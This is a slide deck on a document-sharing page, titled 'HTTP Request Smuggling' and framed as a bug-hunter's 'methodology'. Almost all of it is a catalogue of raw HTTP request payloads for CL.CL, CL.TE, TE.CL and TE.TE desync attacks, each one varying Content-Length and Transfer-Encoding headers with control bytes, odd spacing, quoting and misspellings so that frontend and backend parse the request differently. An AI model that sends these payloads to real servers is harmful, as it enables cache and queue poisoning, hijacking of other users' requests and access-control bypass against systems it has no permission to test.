0% found this document useful (0 votes)

29 views134 pages

HTTP Request Smuggling

The document outlines various methodologies for executing HTTP request smuggling attacks, detailing how attackers can manipulate the Content-Length and Transfer-Encoding headers to trick frontends and backends into processing multiple requests. Each method demonstrates different header variations and their implications on request handling. The focus is on exploiting discrepancies between frontend and backend interpretations of HTTP requests.

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

29 views134 pages

HTTP Request Smuggling

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 134

Request

Smuggling

Mahmoud M. Awali
@0xAwali
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content-Length: Number But Backend Assumes There Are Two Request

● Blog
POST / HTTP/1.1
● Blog Host: www.company.com
Content-Length: Number
● Slides
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content-Length : Number But Backend Assumes There Are Two Request

● Blog
POST / HTTP/1.1
Host: www.company.com
Content-Length : Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content-Length abcd: Number But Backend Assumes There Are Two Request

● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length abce: Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

\rContent-Length: Number But Backend Assumes There Are Two Request

● Slides
POST / HTTP/1.1
Host: www.company.com
\rContent-Length: Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content\rLength: Number But Backend Assumes There Are Two Request

● Slides
POST / HTTP/1.1
Host: www.company.com
Content\rLength: Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content\x20Length: Number But Backend Assumes There Are Two Request

● Slides
POST / HTTP/1.1
Host: www.company.com
Content\x20Length: Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling CL != 0 , Frontend sees

Content-Length: Number Number But Backend Assumes There Are Two Request

● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number Number

GET / HTTP/1.1\r\n
Host: www.company.com\r\n
X:
My Methodology

attacker

Try To Use HTTP Request Smuggling Connections Header Trick , Frontend Drop
Content-Length Header So Backend May Be See TWO Requests

● Video POST / HTTP/1.1

Host: www.company.com
Connection: Content-Length
Content-Length: Number

Backend\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.CL , Frontend sees

Content-Length: Number But Backend sees Content-Length: Number

● Video
POST / HTTP/1.1
● Blog Host: www.company.com
Content-Length: Number
● Blog Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.CL , Frontend sees

Content-Length: Number But Backend sees Content-Length absc: Number

● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number
Content-Length abcd: Number

Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.CL , Frontend sees Content-Length:

Number But Backend sees Content-Length absc: Number With HTTP/1.2

● Slides
POST / HTTP/1.1
Host: www.company.com
Content-Length: Number
Content-Length abcd: Number

Backend\r\n
GET / HTTP/1.2\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.CL , Frontend sees Content-Length:

Number But Backend sees Content-Length absc: Number With MIME text/plain

● Slides POST / HTTP/1.1

Host: www.company.com
Content-Type: text/plain
Content-Length: Number
Content-Length abcd: Number

Backend\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Blog Content-Length: Number
Transfer-Encoding: chunked
● Blog
0\r\n
● Writeup \r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Video POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked
● Blog Content-Length: Number

● Blog Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
● Blog Transfer-Encoding: chunked
Transfer-Encoding: nothing
● Video Backend\r\n
GET / HTTP/1.1\r\n
● Writeup Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding : chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Blog Content-Length: Number
Transfer-Encoding : chunked
● Blog
0\r\n
● Writeup \r\n
GET / HTTP/1.1\r\n
● Writeup X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding : chunked But Backend sees Content-Length: Number

● Video POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding : chunked
● Blog Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding : chunked
Transfer-Encoding : nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Writeup Content-Length: Number
Transfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Video POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\n\u000Bchunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:\n\u000Bchunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\n\u000Bchunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\n\u000Bchunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\n\u000Bchunked
Transfer-Encoding:\n\u000Bnothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\u000Bchunked

● Resource POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\u000Bchunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\u000Bchunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\u000Bchunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\u000Bchunked
Transfer-Encoding:\u000Bnothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\n chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:\n chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\n chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\n chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Resource POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\n chunked
Transfer-Encoding:\n nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Content-Encoding: chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Content-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Content-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Content-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Content-Encoding: chunked
Content-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer_Encoding: chunked

● Blog POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer_Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer_Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer_Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer_Encoding: chunked
Transfer_Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\r\n chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Blog Content-Length: Number
Transfer-Encoding:
chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\r\n chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:
● Resource chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:
chunked
Transfer-Encoding:
nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\n chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:\n chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\n chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\n chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\n chunked
Transfer-Encoding:\n nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\xFFchunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:\xFFchunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\xFFchunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\xFFchunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\xFFchunked
Transfer-Encoding:\xFFnothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:\xA0chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:\xA0chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:\xA0chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:\xA0chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:\xA0chunked
Transfer-Encoding:\xA0nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chu\x96nked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: chu\x96nked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chu\x96nked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chu\x96nked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chu\x96nked
Transfer-Encoding: \x96nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding\n : chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding\n : chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding\n : chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding\n : chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding\n : chunked
Transfer-Encoding\n: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer\r-Encoding: chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer\r-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer\r-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer\r-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer\r-Encoding: chunked
Transfer\r-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfe\x82r-Encoding: chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfe\x82r-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfe\x82r-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfe\x82r-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfe\x82r-Encoding: chunked
Transfe\x82r-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunked\r

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: chunked\r

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunked\r But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked\r
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked\r
Transfer-Encoding: nothing\r

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees "Transfer-Encoding: chunked "

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

"Transfer-Encoding: chunked " But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees "Transfer-Encoding : chunked"

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding : chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding : chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding : chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding : chunked
Transfer-Encoding : nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: "chunked"

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: "chunked"

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: "chunked" But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding : "chunked"
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: "chunked"
Transfer-Encoding: "nothing"

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: 'chunked'

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: 'chunked'

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: 'chunked' But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding : 'chunked'
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: 'chunked'
Transfer-Encoding: 'chunked'

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding\r\n : chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding
: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding\r\n : chunked But Backend sees Content-Length: Number

● Mine POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding
: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding
: chunked
Transfer-Encoding
: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: xchunked

● Video
POST / HTTP/1.1
Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: xchunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: xchunked But Backend sees Content-Length: Number

● Video POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: xchunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: xchunked
Transfer-Encoding: xnothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees ' Transfer-Encoding: chunked'

● Video
POST / HTTP/1.1
Host: www.company.com
● Blog Content-Length: Number
Transfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

' Transfer-Encoding: chunked' But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees X: X\nTransfer-Encoding: chunked

● Video
POST / HTTP/1.1
Host: www.company.com
● Video Content-Length: Number
X: X\nTransfer-Encoding: chunked
● Writeup
0\r\n
\r\n
GET / HTTP/1.1
X: X
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

X: X\rTransfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
X: X\nTransfer-Encoding: chunked
● Resource Content-Length: Number
